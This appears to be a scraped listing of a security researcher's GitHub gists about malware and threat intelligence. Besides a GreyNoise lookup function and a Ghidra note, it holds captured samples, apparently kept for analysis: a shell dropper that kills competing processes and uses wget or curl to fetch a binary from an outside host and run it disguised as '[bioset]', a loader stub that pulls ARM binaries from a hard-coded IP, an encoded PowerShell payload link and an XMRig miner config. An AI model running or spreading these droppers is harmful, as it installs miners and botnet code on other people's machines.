Remco Verhoef nl5887

## gist:0a55e297aad9bf5f4882deb44ea0ef79
function greynoise
     if test (count $argv) -eq 0
         echo "No arguments specified. Usage:\necho greynoise {ip}"
         return 1
     end

     set ip $argv[1]

     curl -s -XPOST -d "ip=$ip" 'http://api.greynoise.io:8888/v1/query/ip'|jq '.'
end

## 001_readme.md

      
              3 files
            
          
              1 fork
            
          
              0 comments
            
          
              6 stars
            
          
                nl5887
                / 001_readme.md
            
            
              Last active Apr 18, 2019
            
              
                Metasploit Meterpreter handler servers (HTTP/HTTPS) 
              
          
      View 001_readme.md
  
    
    This gist contains a list of verified Metasploit Meterpreter http(s) handlers and Powershell Empire http(s) listeners.
Servers could be malicious, or just part of a red teaming action.
Thanks to censys.io and Jose.

  
## 000_readme.md

      
              4 files
            
          
              0 forks
            
          
              0 comments
            
          
              0 stars
            
          
                nl5887
                / 000_readme.md
            
            
              Created Mar 7, 2019
            
          
      View 000_readme.md
  
    
    http://172.97.69.129/1.ps1
[step 1](https://gchq.github.io/CyberChef/#recipe=From_Base64('A-Za-z0-9%2B/%3D',true)Decode_text('UTF16LE%20(1200)')&input=SmdBb0FGc0Fjd0JqQUhJQWFRQndBSFFBWWdCc0FHOEFZd0JyQUYwQU9nQTZBR01BY2dCbEFHRUFkQUJsQUNnQUtBQk9BR1VBZHdBdEFFOEFZZ0JxQUdVQVl3QjBBQ0FBU1FCUEFDNEFVd0IwQUhJQVpRQmhBRzBBVWdCbEFHRUFaQUJsQUhJQUtBQk9BR1VBZHdBdEFFOEFZZ0JxQUdVQVl3QjBBQ0FBU1FCUEFDNEFRd0J2QUcwQWNBQnlBR1VBY3dCekFHa0Fid0J1QUM0QVJ3QjZBR2tBY0FCVEFIUUFjZ0JsQUdFQWJRQW9BQ2dBVGdCbEFIY0FMUUJQQUdJQWFnQmxBR01BZEFBZ0FFa0FUd0F1QUUwQVpRQnRBRzhBY2dCNUFGTUFkQUJ5QUdVQVlRQnRBQ2dBTEFCYkFFTUFid0J1QUhZQVpRQnlBSFFBWFFBNkFEb0FSZ0J5QUc4QWJRQkNBR0VBY3dCbEFEWUFOQUJUQUhRQWNnQnBBRzRBWndBb0FDY0FTQUEwQUhNQVNRQkJBRThBYVFCMEFGVUFSZ0J6QUVNQVFRQTNBRllBVndCaEFEUUFMd0JoQUZJQWFBQm1BQ3NBYmdCRkFHb0FOUUJFQURFQVlRQkdBR2dBUmdCRkFFb0FXUUJEQURZQU53QXlBRlVBYVFCV0FHRUFad0JOQURJQVNnQndBR2tBWWdBNEFGSUFhZ0JaQUhJQWNRQnlBRUlBU0FCMEFITUFSQUEwQURnQWRnQmhBSGNBTndCWUFIUUFaZ0FyQURnQWVBQnNBRElBVXdCeUFHSUFUZ0J5QUdzQWJBQldBRFFBVEFCcEFDOEFSd0JqQUhrQU5RQjZBSG9BYmdCSEFH

  
## 00_readme.md

      
              3 files
            
          
              0 forks
            
          
              0 comments
            
          
              1 star
            
          
                nl5887
                / 00_readme.md
            
            
              Last active Jun 4, 2019
            
              
                Ghidra decompile 
              
          
      View 00_readme.md
  
    
    Ghydra decompiler
This python script communicates with the Ghydra decompiler. Currently it succeeds in communicating, sending hardcoded opcodes and returning decompiled code.
Currently working on reversing the getPcodePacked command.
Next steps:

implement exception handling
implement callbacks
allow decompilation of custom payloads


## all
ps aux |awk '$3>40.0{print $2}'|xargs kill -9
cd /tmp
if [ $? -ne 0 ]
then
export PATH=`pwd`:$PATH
else
export PATH=/tmp:$PATH
fi
wget -q v.kernelupgr.com/d/vv -O \[bioset\] || curl -s v.kernelupgr.com/d/vv -o \[bioset\]
chmod +x \[bioset\]

## a
#!/bin/sh

# Edit
WEBSERVER="209.141.50.26"
# Stop editing now


BINARIES="arm arm7 arm64"

for Binary in $BINARIES; do

## gist:e7b044f7d264dba7d88daed49a3c084e
#!/usr/bin/env python
# -*- coding: utf-8 -*-
# Copyright 2012-2017 Matt Martz
# All Rights Reserved.
#
#    Licensed under the Apache License, Version 2.0 (the "License"); you may
#    not use this file except in compliance with the License. You may obtain
#    a copy of the License at
#
#         http://www.apache.org/licenses/LICENSE-2.0

## gist:9cb88cf2ef9849d3873b611bce3b0aaa
A1/knnUWULU2NiOgmM//YB9bTMpU+Zg3JfBube+UUTbHcbV0/akpEn/3VnZb7lYTDCxazq0efcDarXzQK6X1Xnk4pAYgqCOhlLjjqhSLWk6Uy+c8Fd0Q69dhMG4neFv2HbTohqdIrv+5iixaKhxP3lMJVW5TAiuRJrHiMA5z4MxgTX89Oz8jM+S5bcQhKVPfk8LrRLFk2Zlp7hj68e2Cqaa/wQC8osJPLm/Y/ejJgjQg4WpHJ+bEEZWIRmr0dhsZLYSWBn1FEMzv43KkrDAmb1gM9G63Llxj8MfZlOcZXcnDgn7e4ytoL56mkcBUOEYmG/5JJ2OQvIkcheq+77rztisgsPxSVdo+KQyVbYrCvFCHb2Eh
A1/kzSIfAKdirHqv4ILCwBmTbiutpRbIQIGZJ38p5ugwNTjDYvnj73yC/sZbhoIXG/x4OwI4SgwijkqkiBELYSBf13gS5Y1pxnswZuhytjkpsBpBUCmsggE27TRtm9BD9V+BuQOIlPigmmJ6G+4dWnc4kCNkdh/4ga7Ym2AzuPDK0TgDkyds4OSkh271uGC0Q6WC0YleKGaF6oi1rMSUhI8NqzBtVTwNafUR49t0LxArB9DQuSzbGVqXBnPZpSKsfkq0Wv+vaDekCouZ6vFQ2YPXr8IxRXoxxGHgJVuANxPPb3jzHcSgo76BX2i4OLNeS1k1lZqmgUc7qz7XgNxlnTAKaSAu4kLjgZkrE8tpFU3LqFRece8D84Sy
A16zzHwSVQTcEZqvZ61pmw0hpca/WzVMF2kP89s5/9I4y2J47hcQidU1h4pzyZdA0F5QtAzrEKkveIpAQEPdX3/74CBVf5qE49Dmy6Od4YQgpEoX2KXGrHUJC+HsVZUr5efGu1H1aLiZH1Y/0mxvzVRuYZDN01jLAXDhTEOfFbAarX86B5ckT/3VdO2gdNvvku/26rHdLC0SbiwyfElwCz9SMePTI+TT5hlnmh2oTwzy5+UwUUBVwJAAU2LkT2OAIOzdPpWVvSLYSKRqP7xaPI

## gist:9f3413ed486b117134c59aa4daee17b8
MD5 (/Users/remco/Downloads/paimon.x86) = 5efce325c5aa2fa11553bf6a4bd94b74

arch     x86
baddr    0x8048000
binsz    37184
bintype  elf
bits     32
canary   false
sanitiz  false
class    ELF32

## config.json
{
    "algo": "cryptonight", // cryptonight (default) or cryptonight-lite
    "av": 0, // algorithm variation, 0 auto select
    "background": true, // true to run the miner in the background
    "colors": true, // false to disable colored output
    "cpu-affinity": null, // set process affinity to CPU core(s), mask "0x3" for cores 0 and 1
    "cpu-priority": null, // set process priority (0 idle, 2 normal to 5 highest)
    "donate-level": 3, // donate level, mininum 1%
    "log-file": null, // log all output to a file, example: "c:/some/path/xmrig.log"
    "max-cpu-usage": 65, // maximum CPU usage for automatic mode, usually limiting factor is CPU cache not this option.